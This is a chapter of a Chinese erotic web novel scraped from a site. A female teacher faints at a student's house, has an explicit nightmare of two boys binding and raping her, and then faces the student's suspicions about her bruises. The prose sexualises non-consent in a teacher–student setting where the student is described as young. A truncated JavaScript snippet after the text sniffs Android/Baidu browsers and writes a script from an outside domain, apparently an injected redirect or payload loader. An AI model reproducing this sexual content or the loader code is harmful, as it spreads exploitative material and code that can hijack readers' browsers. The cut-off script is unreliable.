逃脱 分卷阅读11

    ,所以向校长请了三天假……不过,我想同学们是不会撒谎的,我不想追究这三天你为什么没去,但是我希望明天能够在课堂上见到你,可以吗?”蓝静仪热切地问过去。

    但是蓝蕻面无表情地闭着眼睛,一脸的淡漠,像是睡着了。

    “蓝蕻……睡了吗?”她低低地问,心里涌上一层挫败感。

    “如果困了,就去卧室里睡,这里会感冒的……”

    长长的睫毛轻轻地颤了颤,却并没有睁开眼。蓝静仪轻轻的叹了口气,她知道他并没有睡,只是不想理她。

    坐了一会儿,她站了起来,将手里的一只纸袋放在桌上。

    “这是三天来各科的笔记,我复印了一份,你留下预习吧。我们……都很想你……明天见”她又看了他一眼,站起身向外走。

    走过游泳池时,她突然感到一阵眩晕,双腿一软,就一头踩进了水池里。

    “咚”一声响,蓝蕻迅速张开眼,眼前已经没了蓝静仪的踪影,只有水面泛起的水花。他跳起来,甩掉浴巾,一头扎进水里。

    两个男孩将蓝静仪按在大床上,迅速扒光她的衣服,用绳索将她绑起来。他们一左一右挨着她躺下来,玩弄着她的身体。

    玩弄一阵之后,其中一个黑发男孩跳下床,解开她脚上的绳索,将她的腿高高举起来,炽热的眼光停在她的私密处,并伸出手指来拨弄她的花瓣,男孩坚硬的欲望抵着她的大腿。

    “葎,她的好紧,我受不了了,先插进去了”说着他已经将她的腿掰开到最大,硕大的男根顶住她的入口,腰一挺刺向她的花心。

    “不要!”蓝静仪尖叫一声,坐了起来。她喘息着,发现只是一场恶梦,而她的脸上却布满了汗水。

    门打开了,一个男孩跑进来,“怎么了,你没事吧?”

    “蓝蕻?”蓝静仪怔怔地看着他,用手掐住额头,她想起来了,是她晕在了游泳馆里。

    蓝蕻没再说话,眼睛一直盯在她的腿上,目光非常奇怪。蓝静仪往腿上看,她惊呼一声,迅速拿起被单遮住自己。

    她身上只穿着一件男式T恤,T恤很肥大,几乎将将遮住她的膝盖,而T恤里面,她什么也没穿。

    纳兰葎和纳兰荻给她裸露在外的皮肤涂了一层药膏,并且涂上了粉,以遮盖她身上的瘀青,但被裙子遮住的皮肤什么也没涂,依旧遍布着大大小小的瘀痕。

    刚才她踢掉了被单,膝盖上边的淤痕完全裸露出来。

    她用被单裹住自己,几乎将脸也捂了起来,她的脸在被单里发着烧。简直太糗了,怎么能让自己的学生看到……她简直有去死的欲望。不过,他可能并不知道那些瘀痕的含义,他还太小,根本不了解……她这样安慰着自己。

    “老师晕倒了,掉进泳池里。我让女佣给你换上了我的T恤,我这里没有女人的衣服,你的衣服已经拿去烘干了……老师好些了吗?”蓝蕻看着捂在被单里的女老师,声音平淡地说道。

    蓝静仪露出脸来,僵硬地一笑,“谢谢,我已经好了,给你添麻烦了,那个……我的衣服……我换上就走”说着,她咬着唇看了蓝蕻一眼,蓝蕻的脸一直是冷冰冰的。

    蓝蕻撇开脸,隔了一会儿才说,“老师已经结婚了吗?”

    “什么?”蓝静仪问出来就立刻明白了那句问话的意思,脸一直红到了脖根儿,“我……真的该走了……我的衣服……?”她的声音细若蚊鸣。

    蓝蕻盯着她的脸,她却不敢和他对视。如果有个洞,她会想立刻钻进去。

    “少爷,蓝小姐的衣服已经烘干了”女佣打开门,将衣服递进来,蓝蕻接过去,将女佣打发走了。

    他手里抓着衣服,却不递给蓝静仪,“我的问题老师为什么不回答,这么难吗,听说老师还是单身,或许是我听错了?再或许……老师只是有了男朋友……”

    蓝静仪过来拿过衣服去,低着头,“你能出去一下吗?我……换了衣服就走……”

    蓝蕻看了她一会儿,“老师可以留下来吃早餐”说完,他转身走了出去。

    蓝静仪一惊,已经是早上了吗,她抬头看墙壁上的钟,时针已经指向7点,原来她昏睡了一夜。

    她没有回逸蓝别墅,他们会不会……她心里一阵慌乱,迅速穿好了衣服走出去。

    蓝蕻正在一楼餐厅里用餐,陈伯看到她躬了躬身子,“蓝老师,早上好”

    “陈伯早上好”蓝静仪很不自在地匆匆打了招呼,就转向蓝蕻,他一直没抬头看她,“蓝蕻,我先回学校了,还有些资料没整理,你吃完饭再去吧”

    正要走,蓝蕻已经站起身一把拉住她,“留下来用早餐吧,老师?”他淡漠的眼睛停在她脸上。

    “不了”蓝静仪推辞。但蓝蕻的手并没放开,仍是挑着眉看她。

    “好……吧”她只得答应,蓝蕻帮她拉开椅子,等她坐好,才在对面坐下。

    蓝静仪扭了扭身子,“我……最近在练跆拳道,那位师父很厉害,摔得我骨头都断了,所以身上总是青一块紫一块……”蓝静仪不自在地笑笑,蓝蕻从餐盘上抬头扫了她一眼,在他淡漠的瞳仁里,蓝静仪看到了他的不信任。

    她咬了咬唇,垂下头,开始一起不响地吃早餐。蓝蕻也不说话,餐厅里只听到刀钗碰到瓷器上叮咚的脆响。

    车子驶进蓝山校园,缓缓停稳,蓝蕻下车为蓝静仪打开车门。

    蓝静仪拎着皮包,对蓝蕻说,“谢谢你的便车,你的车技很好哦。你先回教室吧,我还要去办公室整理一下,呆会儿还要上课,对了,别忘了看我给你影印的资料啊”

    蓝蕻不答,只是抿唇看着她。蓝静仪尴尬地一笑,转身迈步,一个踉跄,手臂立刻被蓝蕻抓住,“老师身体好像很虚弱,用不用我送你?”

    “不用,谢谢,快回教室吧”蓝静仪脱开他的手。

    “老师”肖英跑过来,看到蓝蕻后她脸上露出奇怪的表情,“你们……一起来的吗?”

    “是啊”蓝静仪点头,看了蓝蕻一眼,却并没注意到肖英狐疑的脸色。

    “我们一起回教室吧”肖英走过蓝蕻身边时说道。蓝蕻只面无表情地说,“不用”连看也没看肖英。肖英脸色又变了变,看了看身边的两个人,就低头跑远了。

    “我送你回办公室”蓝蕻转身对蓝静仪说。

    “我真的没事,你快回教室吧”蓝静仪笑了笑,转身时却又被蓝蕻抓住,“老师怕什么,既然怕又为什么承认是和我一起来的?”

    “我们本来就是一起来的呀”

    蓝蕻轻笑,“不知老师是思想简单还是一根筋,我们的确是一起来学校,但别人却并不会简单的这样认为”

    蓝静仪皱眉,“什么……意思?”

    “别人会以为……”

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('